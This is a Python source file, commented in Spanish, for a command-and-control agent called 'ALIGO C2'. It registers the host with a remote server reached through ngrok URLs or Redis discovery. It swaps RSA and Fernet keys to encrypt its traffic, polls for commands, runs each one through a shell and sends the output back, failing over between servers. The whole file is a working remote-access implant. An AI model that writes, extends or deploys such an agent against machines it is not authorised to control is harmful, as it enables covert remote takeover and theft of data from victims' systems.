"""
Agente C2 - Versión HTTPS para ngrok/Internet con Cifrado Híbrido + Redis Discovery
CONFIGURADO PARA: Conectarse a servidor via HTTP/HTTPS (ngrok) con failover automático
CIFRADO: RSA-2048 key exchange + Fernet session encryption
REDIS: Descubrimiento automático de servidores disponibles

USO:
    # Conectar al primer servidor disponible en Redis
    python3 agent_ngrok.py
    
    # Conectar a servidor específico (sin Redis)
    python3 agent_ngrok.py https://abc123.ngrok.io
"""

import json
import subprocess
import platform
import uuid
import time
import sys
import os

try:
    import requests
except ImportError:
    print("[!] ERROR: Se requiere el módulo 'requests'")
    print("[*] Instálalo con: pip install requests")
    sys.exit(1)

# Intentar importar Redis (opcional)
REDIS_AVAILABLE = False
redis_client = None
try:
    import redis
    REDIS_AVAILABLE = True
except ImportError:
    print("[!] Redis no disponible - usando modo URL directa")
    print("[*] Para habilitar Redis: pip install redis")

# Import crypto utilities
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
from shared.crypto_utils import C2Crypto

# ============================================
# CONFIGURACIÓN FLEXIBLE
# ============================================

# Redis configuration
REDIS_HOST = os.getenv("REDIS_HOST", "127.0.0.1")
REDIS_PORT = int(os.getenv("REDIS_PORT", 6379))

# Si se pasa URL como argumento, usarla directamente (sin Redis)
if len(sys.argv) >= 2:
    SERVER_URL = sys.argv[1].rstrip('/')
    USE_REDIS = False
else:
    SERVER_URL = None
    USE_REDIS = REDIS_AVAILABLE

AGENT_ID = "agent-" + str(uuid.uuid4())[:6]
RECONNECT_DELAY = 5  # segundos antes de reintentar si se cae la conexión
POLL_INTERVAL = 3    # segundos entre cada poll al servidor (aumentado de 2 a 3)

# Cryptographic state (established during handshake)
agent_session_key = None      # Fernet symmetric key (generated by agent)
server_public_key = None      # Server's RSA public key (fetched from server)

# Servers list (populated from Redis)
servers_list = []
current_server_index = 0


def execute_command(command: str) -> str:
    """Ejecuta un comando del sistema y captura su salida."""
    try:
        result = subprocess.run(
            command,
            shell=True,
            capture_output=True,
            text=True,
            timeout=30,
        )
        output = result.stdout if result.stdout else result.stderr
        return output.strip() or "(sin salida)"
    except subprocess.TimeoutExpired:
        return "(error) comando excedió el tiempo límite"
    except Exception as e:
        return f"(error) {e}"


# ============================================
# FUNCIONES DE REDIS
# ============================================

def connect_to_redis():
    """Conecta a Redis para descubrimiento de servidores."""
    global redis_client
    
    if not REDIS_AVAILABLE:
        return False
    
    try:
        redis_client = redis.Redis(
            host=REDIS_HOST,
            port=REDIS_PORT,
            decode_responses=True,
            socket_connect_timeout=3
        )
        redis_client.ping()
        print(f"[✓] Conectado a Redis en {REDIS_HOST}:{REDIS_PORT}")
        return True
    except Exception as e:
        print(f"[!] No se pudo conectar a Redis: {e}")
        return False


def get_servers_from_redis():
    """Obtiene lista de servidores activos desde Redis."""
    global servers_list
    
    if not redis_client:
        return False
    
    try:
        keys = redis_client.keys("server:*:ngrok_url")
        servers = []
        
        for key in keys:
            server_name = key.split(":")[1]
            url = redis_client.get(key)
            if url:
                servers.append({
                    "name": server_name,
                    "url": url.rstrip('/')
                })
        
        # Ordenar por nombre para consistencia
        servers.sort(key=lambda x: x['name'])
        servers_list = servers
        
        if len(servers) > 0:
            print(f"[*] {len(servers)} servidores encontrados en Redis:")
            for i, server in enumerate(servers):
                print(f"    {i}: {server['name']} -> {server['url']}")
            return True
        else:
            print("[!] No hay servidores registrados en Redis")
            return False
    
    except Exception as e:
        print(f"[!] Error consultando Redis: {e}")
        return False


# ============================================
# FUNCIONES DE CIFRADO
# ============================================


def fetch_server_public_key():
    """
    Fetch the server's RSA public key from /public-key endpoint.
    
    Returns:
        RSA public key object, or None if failed
    """
    global SERVER_URL
    
    try:
        response = requests.get(
            f"{SERVER_URL}/public-key",
            timeout=15  # Aumentado de 10 a 15
        )
        response.raise_for_status()
        data = response.json()
        
        pem_key = data.get('public_key')
        if not pem_key:
            print("[!] Server did not return public key")
            return None
        
        # Deserialize PEM to public key object
        public_key = C2Crypto.deserialize_public_key(pem_key)
        return public_key
        
    except Exception as e:
        print(f"[!] Error fetching server public key: {e}")
        return None


def establish_crypto_session():
    """
    Establish cryptographic session:
    1. Fetch server's RSA public key
    2. Generate agent's Fernet session key
    
    Returns:
        tuple: (agent_session_key, server_public_key) or (None, None) if failed
    """
    global server_public_key, agent_session_key
    
    print("[*] Estableciendo sesión criptográfica...")
    
    # Step 1: Fetch server's public key
    server_public_key = fetch_server_public_key()
    if not server_public_key:
        return None, None
    
    print("[✓] Clave pública del servidor obtenida")
    
    # Step 2: Generate agent's session key
    agent_session_key = C2Crypto.generate_session_key()
    print("[✓] Session key generada (Fernet)")
    
    return agent_session_key, server_public_key


def checkin():
    """Registro inicial en el servidor con session key cifrada."""
    global agent_session_key, server_public_key
    
    if not agent_session_key or not server_public_key:
        print("[!] Crypto session not established")
        return False
    
    try:
        # Encrypt the session key with server's RSA public key
        encrypted_session_key = C2Crypto.rsa_encrypt(server_public_key, agent_session_key)
        
        response = requests.post(
            f"{SERVER_URL}/checkin",
            json={
                "agent_id": AGENT_ID,
                "hostname": platform.node(),
                "os": platform.system(),
                "encrypted_session_key": encrypted_session_key
            },
            timeout=15  # Aumentado de 10 a 15
        )
        response.raise_for_status()
        print("[✓] Check-in exitoso (session key intercambiada)")
        return True
    except Exception as e:
        print(f"[!] Error en checkin: {e}")
        return False


def poll_command():
    """Preguntar al servidor si hay comandos pendientes (recibe respuesta cifrada)."""
    global agent_session_key
    
    if not agent_session_key:
        print("[!] No session key available")
        return None
    
    try:
        response = requests.post(
            f"{SERVER_URL}/poll",
            json={"agent_id": AGENT_ID},
            timeout=15  # Aumentado de 10 a 15
        )
        response.raise_for_status()
        data = response.json()
        
        encrypted_payload = data.get("payload")
        if not encrypted_payload:
            return None
        
        # Decrypt the payload
        try:
            decrypted_json = C2Crypto.fernet_decrypt(agent_session_key, encrypted_payload)
            cmd_data = json.loads(decrypted_json)
            
            # Check if there's an actual command
            if cmd_data.get("command") is not None:
                return cmd_data
            return None
            
        except Exception as decrypt_error:
            print(f"[!] Error decrypting command: {decrypt_error}")
            return None
        
    except requests.exceptions.Timeout as e:
        print(f"[!] Timeout en poll (15s excedidos): {e}")
        return None
    except requests.exceptions.ConnectionError as e:
        print(f"[!] Error de conexión en poll: {e}")
        return None
    except Exception as e:
        print(f"[!] Error en poll: {e}")
        return None


def send_result(msg_id: str, output: str, status: str = "ok"):
    """Enviar resultado de comando al servidor (cifrado con session key)."""
    global agent_session_key, SERVER_URL
    
    if not agent_session_key:
        print("[!] No session key available")
        return False
    
    try:
        # Prepare result data
        result_data = {
            "id": msg_id,
            "output": output,
            "status": status,
        }
        
        # Encrypt the result
        result_json = json.dumps(result_data)
        encrypted_payload = C2Crypto.fernet_encrypt(agent_session_key, result_json)
        
        response = requests.post(
            f"{SERVER_URL}/result",
            json={
                "agent_id": AGENT_ID,
                "payload": encrypted_payload
            },
            timeout=15  # Aumentado de 10 a 15
        )
        response.raise_for_status()
        return True
    except Exception as e:
        print(f"[!] Error enviando resultado: {e}")
        return False


def select_next_server():
    """Selecciona el siguiente servidor de la lista (failover)."""
    global current_server_index, SERVER_URL
    
    if not servers_list:
        print("[!] No hay servidores disponibles")
        return False
    
    # Rotar al siguiente servidor
    current_server_index = (current_server_index + 1) % len(servers_list)
    server = servers_list[current_server_index]
    SERVER_URL = server['url']
    
    print(f"\n[→] Cambiando a servidor: {server['name']} ({SERVER_URL})")
    return True


def try_connect_to_server(server_url):
    """Intenta conectar a un servidor específico con cifrado."""
    global SERVER_URL, agent_session_key, server_public_key
    
    SERVER_URL = server_url
    
    print(f"[*] Estableciendo handshake criptográfico con {SERVER_URL}...")
    
    # Establecer sesión criptográfica
    session_key, pub_key = establish_crypto_session()
    
    if not session_key or not pub_key:
        print(f"[!] Falló el handshake criptográfico")
        return False
    
    # Checkin
    if not checkin():
        print(f"[!] Checkin falló")
        return False
    
    print(f"[+] ✅ Conectado como {AGENT_ID}")
    print(f"[+] 🔒 Canal cifrado establecido")
    return True


def run_agent():
    print(f"[*] Agente ID: {AGENT_ID}")
    print(f"[*] Cifrado: RSA-2048 + Fernet (AES-128-CBC)")
    
    # Determinar modo de conexión
    if USE_REDIS:
        print(f"[*] Modo: Descubrimiento vía Redis ({REDIS_HOST}:{REDIS_PORT})")
    else:
        print(f"[*] Modo: URL directa")
        print(f"[*] Servidor: {SERVER_URL}")
    
    print(f"[*] Presiona Ctrl+C para detener")
    print()
    
    # Loop principal
    consecutive_failures = 0
    
    while True:
        try:
            # Modo Redis: obtener lista de servidores
            if USE_REDIS and not servers_list:
                print(f"[*] Conectando a Redis para descubrir servidores...")
                if connect_to_redis():
                    if get_servers_from_redis() and len(servers_list) > 0:
                        # Intentar conectar al primer servidor
                        server = servers_list[0]
                        if try_connect_to_server(server['url']):
                            consecutive_failures = 0
                        else:
                            print(f"[!] No se pudo conectar a {server['name']}")
                            time.sleep(RECONNECT_DELAY)
                            continue
                    else:
                        print(f"[!] No hay servidores disponibles, reintentando en {RECONNECT_DELAY}s...")
                        time.sleep(RECONNECT_DELAY)
                        continue
                else:
                    print(f"[!] Redis no disponible, reintentando en {RECONNECT_DELAY}s...")
                    time.sleep(RECONNECT_DELAY)
                    continue
            
            # Modo URL directa: conectar directamente
            elif not USE_REDIS and SERVER_URL:
                print(f"[*] Conectando a {SERVER_URL}...")
                if try_connect_to_server(SERVER_URL):
                    consecutive_failures = 0
                else:
                    print(f"[!] No se pudo conectar, reintentando en {RECONNECT_DELAY}s...")
                    time.sleep(RECONNECT_DELAY)
                    continue
            else:
                print(f"[!] No hay configuración válida (Redis o URL)")
                sys.exit(1)
            
            # Loop de polling
            while True:
                # Refrescar lista de servidores cada 60 segundos (solo en modo Redis)
                if USE_REDIS and int(time.time()) % 60 == 0:
                    get_servers_from_redis()
                
                # Preguntar si hay comandos
                cmd_data = poll_command()
                
                if cmd_data and cmd_data.get("type") == "cmd":
                    cmd = cmd_data.get("command")
                    msg_id = cmd_data.get("id")
                    
                    print(f"[cmd recibido] id={msg_id}: {cmd}")
                    
                    # Ejecutar comando
                    output = execute_command(cmd)
                    
                    # Enviar resultado
                    if send_result(msg_id, output):
                        print(f"[resultado enviado] id={msg_id}")
                        consecutive_failures = 0
                    else:
                        print(f"[!] Fallo al enviar resultado id={msg_id}")
                        consecutive_failures += 1
                elif cmd_data is None:
                    # Error en polling
                    consecutive_failures += 1
                else:
                    # No hay comandos, resetear contador
                    consecutive_failures = 0
                
                # Si hay 3 fallos consecutivos, intentar failover
                if consecutive_failures >= 3:
                    print(f"\n[!] 3 fallos consecutivos detectados")
                    
                    if USE_REDIS and len(servers_list) > 1:
                        print(f"[*] Intentando failover a otro servidor...")
                        if select_next_server():
                            server = servers_list[current_server_index]
                            if try_connect_to_server(server['url']):
                                consecutive_failures = 0
                                print(f"[+] Failover exitoso a {server['name']}")
                            else:
                                print(f"[!] Failover falló")
                                time.sleep(RECONNECT_DELAY)
                                break
                        else:
                            print(f"[!] No hay más servidores disponibles")
                            time.sleep(RECONNECT_DELAY)
                            break
                    else:
                        print(f"[!] Servidor caído, reintentando conexión...")
                        time.sleep(RECONNECT_DELAY)
                        break
                
                # Esperar antes del siguiente poll
                time.sleep(POLL_INTERVAL)
        
        except requests.exceptions.ConnectionError:
            print(f"[!] No se pudo conectar al servidor")
            consecutive_failures += 1
            if consecutive_failures >= 3 and USE_REDIS and len(servers_list) > 1:
                print(f"[*] Intentando servidor alternativo...")
                select_next_server()
            time.sleep(RECONNECT_DELAY)
        
        except requests.exceptions.Timeout:
            print(f"[!] Timeout al conectar")
            consecutive_failures += 1
            time.sleep(RECONNECT_DELAY)
        
        except KeyboardInterrupt:
            print("\n[*] Agente detenido por el usuario")
            sys.exit(0)
        
        except Exception as e:
            print(f"[!] Error inesperado: {e}")
            consecutive_failures += 1
            time.sleep(RECONNECT_DELAY)


if __name__ == "__main__":
    print("=" * 50)
    print("  ALIGO C2 - Agente HTTPS con Cifrado Híbrido")
    print("=" * 50)
    print()
    
    if len(sys.argv) > 1:
        print("[i] Modo: URL directa (sin Redis)")
        print(f"[i] Servidor: {SERVER_URL}")
    else:
        if REDIS_AVAILABLE:
            print("[i] Modo: Descubrimiento automático vía Redis")
            print(f"[i] Redis: {REDIS_HOST}:{REDIS_PORT}")
            print(f"[i] Tip: Usa REDIS_HOST=<ip> para cambiar IP de Redis")
        else:
            print("[!] ERROR: Redis no disponible y no se especificó URL")
            print(f"[*] Uso: python3 {sys.argv[0]} <url>")
            print(f"[*] Ejemplo: python3 {sys.argv[0]} https://abc123.ngrok.io")
            print(f"[*] O instala Redis: pip install redis")
            sys.exit(1)
    
    print()
    run_agent()
